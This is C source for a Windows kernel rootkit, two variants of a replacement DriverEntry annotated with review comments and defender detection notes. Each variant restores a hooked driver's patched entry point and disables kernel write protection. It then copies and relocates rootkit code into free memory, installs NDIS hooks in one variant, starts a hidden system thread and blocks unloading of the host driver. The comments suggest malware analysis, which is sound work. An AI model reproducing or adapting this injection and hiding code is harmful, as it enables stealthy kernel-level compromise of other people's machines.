//--------------------------------------------------------------------------------------
// Replacement DriverEntry for the driver whose entry point was patched.
// Restores the patched entry bytes, chains to the original entry and, only if
// the original succeeds, copies this module's payload slice into the free area
// located earlier (m_FreeAreaFound) and starts a system thread there.
//
// DriverObject / RegistryPath: forwarded unchanged to the original entry point.
// Returns: the original entry's status, overwritten by the PsCreateSystemThread()
//          status once thread creation is attempted - a thread-creation failure
//          is therefore reported to the loader as the driver's own failure.
//
// Globals read: m_HookedEntry, m_EpOriginalBytes, m_DriverBase, m_DriverSize,
//               m_FreeAreaFound, m_RkOffset, m_RkSize.
// Globals written: m_bDriverMustBeFreed.
//
// Detection notes (defender view): the system thread's start address lies in
// m_FreeAreaFound rather than in any loaded image, the load-image notify routine
// is unregistered here, and the hooked driver's DriverUnload is cleared on
// success - each of these is observable from the kernel side.
NTSTATUS NewDriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath)
{    
    // disable memory write protection
    // NOTE(review): ClearWp() is called directly (not per processor); whether the
    // restore below is safe against concurrent execution on other CPUs depends on
    // what ClearWp() does - confirm against its definition.
    ClearWp();

    // restore original code from image entry point
    // (EP_PATCH_SIZE bytes presumably saved into m_EpOriginalBytes when the
    // entry point was patched - that code is not visible here)
    memcpy(m_HookedEntry, m_EpOriginalBytes, EP_PATCH_SIZE);

    // enable memory write protection
    SetWp();

    // Chain to the now-restored original entry point.
    NTSTATUS ns = m_HookedEntry(DriverObject, RegistryPath);
    DbgMsg(__FUNCTION__"(): Hooked driver returns 0x%.8x\n", ns);    

    // Unregister the load-image callback (presumably the one that installed
    // this hook). The flag records whether removal succeeded; it decides below
    // whether the original driver base is handed to the new thread as context.
    if (PsRemoveLoadImageNotifyRoutine(LoadImageNotify) == STATUS_SUCCESS)
    {
        m_bDriverMustBeFreed = TRUE;
    }

    if (NT_SUCCESS(ns))
    {
        // Staging copy of the whole module in non-paged pool.
        // NOTE: on allocation failure nothing is logged and the original
        // driver's status is returned unchanged.
        PVOID Image = ExAllocatePool(NonPagedPool, m_DriverSize);
        if (Image)
        {
            // prepare rootkit code for injection into the discardable sections
            // The copy is relocated as if the whole image were based at
            // (m_FreeAreaFound - m_RkOffset), so that the slice at m_RkOffset
            // ends up with correct pointers once it lives at m_FreeAreaFound.
            memcpy(Image, m_DriverBase, m_DriverSize);
            RuntimeProcessRelocs(Image, (PVOID)((PUCHAR)m_FreeAreaFound - m_RkOffset));

            // disable memory write protection
            ClearWp();

            // Only the slice [m_RkOffset, m_RkOffset + m_RkSize) is written.
            // No check here that m_RkSize fits the free area - presumably
            // validated where m_FreeAreaFound was chosen; verify.
            memcpy(m_FreeAreaFound, RVATOVA(Image, m_RkOffset), m_RkSize);

            // enable memory write protection
            SetWp();

            // Same virtual base the relocation above assumed.
            PUCHAR PointerFixup = (PUCHAR)m_FreeAreaFound - m_RkOffset;

            // set up NDIS hooks
            DriverEntryInitializePayload(PointerFixup);

            // RECALCULATE_POINTER presumably rebases a pointer in this image onto
            // the copied code - see the macro's definition.
            PKSTART_ROUTINE Start = (PKSTART_ROUTINE)RECALCULATE_POINTER(DriverEntryContinueThread);

            DbgMsg(__FUNCTION__"(): Start address: "IFMT"\n", Start);

            // create thread for execution copied code
            // Context is the original driver base only when the notify routine
            // was removed above (m_bDriverMustBeFreed), otherwise NULL.
            HANDLE hThread = NULL;
            ns = PsCreateSystemThread(
                &hThread, 
                THREAD_ALL_ACCESS, 
                NULL, NULL, NULL, 
                Start, 
                m_bDriverMustBeFreed ? m_DriverBase : NULL
            );
            if (NT_SUCCESS(ns))
            {
                // Handle is not needed any further; the thread keeps running.
                ZwClose(hThread);
            }
            else
            {
                DbgMsg("PsCreateSystemThread() fails: 0x%.8x\n", ns);
            }

            // Staging buffer is no longer referenced: the thread runs from the
            // copy in m_FreeAreaFound, not from Image.
            ExFreePool(Image);
        }

        // don't allow to unload target driver
        DriverObject->DriverUnload = NULL;
    }

    return ns;
}
//--------------------------------------------------------------------------------------
// Replacement DriverEntry for the driver whose entry point was patched
// (second variant: copies this module's headers and resident sections as a
// whole image into m_FreeAreaVA instead of a single payload slice).
// Restores the patched entry bytes, chains to the original entry and, only if
// the original succeeds, rebuilds this module at m_FreeAreaVA, relocates it and
// starts a system thread in the copy.
//
// DriverObject / RegistryPath: forwarded unchanged to the original entry point.
// Returns: the original entry's status, overwritten by the PsCreateSystemThread()
//          status once thread creation is attempted.
//
// Globals read: m_HookedEntry, m_EpOriginalBytes, m_Self (DllBase),
//               m_FreeAreaVA, m_FreeAreaLength.
//
// Detection notes (defender view): the system thread's start address lies in
// m_FreeAreaVA rather than in any loaded image, and the hooked driver's
// DriverUnload is cleared on success - both observable from the kernel side.
NTSTATUS NewDriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath)
{
    // disable memory write protection
    // (ForEachProcessor presumably runs ClearWp on every CPU - confirm)
    ForEachProcessor(ClearWp, NULL);

    // restore original code from image entry point
    // (EP_PATCH_SIZE bytes presumably saved into m_EpOriginalBytes when the
    // entry point was patched - that code is not visible here)
    memcpy(m_HookedEntry, m_EpOriginalBytes, EP_PATCH_SIZE);

    // enable memory write protection
    ForEachProcessor(SetWp, NULL);

    // Chain to the now-restored original entry point.
    NTSTATUS ns = m_HookedEntry(DriverObject, RegistryPath);

    DbgMsg(__FILE__, __LINE__, __FUNCTION__"(): Hooked driver returns 0x%.8x\n", ns);
    if (NT_SUCCESS(ns))
    {
        // PE headers of this module (DOS header -> e_lfanew -> NT headers).
        // The 32-bit NT headers type is used, so this presumably targets a
        // 32-bit build only - verify.
        PIMAGE_NT_HEADERS32 pHeaders = (PIMAGE_NT_HEADERS32)
            ((PUCHAR)m_Self->DllBase + ((PIMAGE_DOS_HEADER)m_Self->DllBase)->e_lfanew);

        // First section header follows the optional header.
        PIMAGE_SECTION_HEADER pSection = (PIMAGE_SECTION_HEADER)
            (pHeaders->FileHeader.SizeOfOptionalHeader + 
            (PUCHAR)&pHeaders->OptionalHeader);

        // disable memory write protection
        ForEachProcessor(ClearWp, NULL);

        // copy driver headers to the founded area
        // NOTE: the whole free area is zeroed, but there is no check that
        // SizeOfHeaders or any section's VirtualAddress + size fits within
        // m_FreeAreaLength - presumably validated where the area was chosen.
        RtlFillMemory(m_FreeAreaVA, m_FreeAreaLength, 0);
        RtlCopyMemory(m_FreeAreaVA, m_Self->DllBase, pHeaders->OptionalHeader.SizeOfHeaders);

        // copy sections
        for (ULONG i = 0; i < pHeaders->FileHeader.NumberOfSections; i++)
        {            
            PVOID DataPtr = (PUCHAR)m_Self->DllBase + pSection->VirtualAddress;

            // Sections whose first page is not resident (e.g. already
            // discarded or paged out) are skipped and stay zero in the copy.
            if (MmIsAddressValid(DataPtr))
            {
                RtlCopyMemory(
                    (PUCHAR)m_FreeAreaVA + pSection->VirtualAddress, 
                    DataPtr,
                    min(pSection->SizeOfRawData, pSection->Misc.VirtualSize)
                );
            }                       

            pSection += 1;
        }        

        // reallocate copied image to the new address
        // The second argument is ImageBase + (m_FreeAreaVA - DllBase):
        // presumably LdrProcessRelocs computes its delta against
        // OptionalHeader.ImageBase, so that the applied delta equals
        // m_FreeAreaVA - DllBase (the code is already relocated to DllBase).
        // Confirm against LdrProcessRelocs.
        LdrProcessRelocs(
            m_FreeAreaVA, (PVOID)((PUCHAR)pHeaders->OptionalHeader.ImageBase - 
            (PUCHAR)m_Self->DllBase + (PUCHAR)m_FreeAreaVA)
        );

        // enable memory write protection
        ForEachProcessor(SetWp, NULL);

        // DriverEntryContinueThread rebased from this image into the copy.
        PKSTART_ROUTINE Start = (PKSTART_ROUTINE)((PUCHAR)DriverEntryContinueThread - 
            (PUCHAR)m_Self->DllBase + (PUCHAR)m_FreeAreaVA);

        // create thread for execution copied driver code
        // (no context is passed in this variant)
        HANDLE hThread = NULL;
        ns = PsCreateSystemThread(
            &hThread, 
            THREAD_ALL_ACCESS, 
            NULL, NULL, NULL, 
            Start, 
            NULL
        );
        if (NT_SUCCESS(ns))
        {
            // Handle is not needed any further; the thread keeps running.
            ZwClose(hThread);
        }
        else
        {
            DbgMsg(__FILE__, __LINE__, "PsCreateSystemThread() fails; status: 0x%.8x\n", ns);
        }

        // don't allow to unload target driver
        DriverObject->DriverUnload = NULL;
    }

    return ns;
}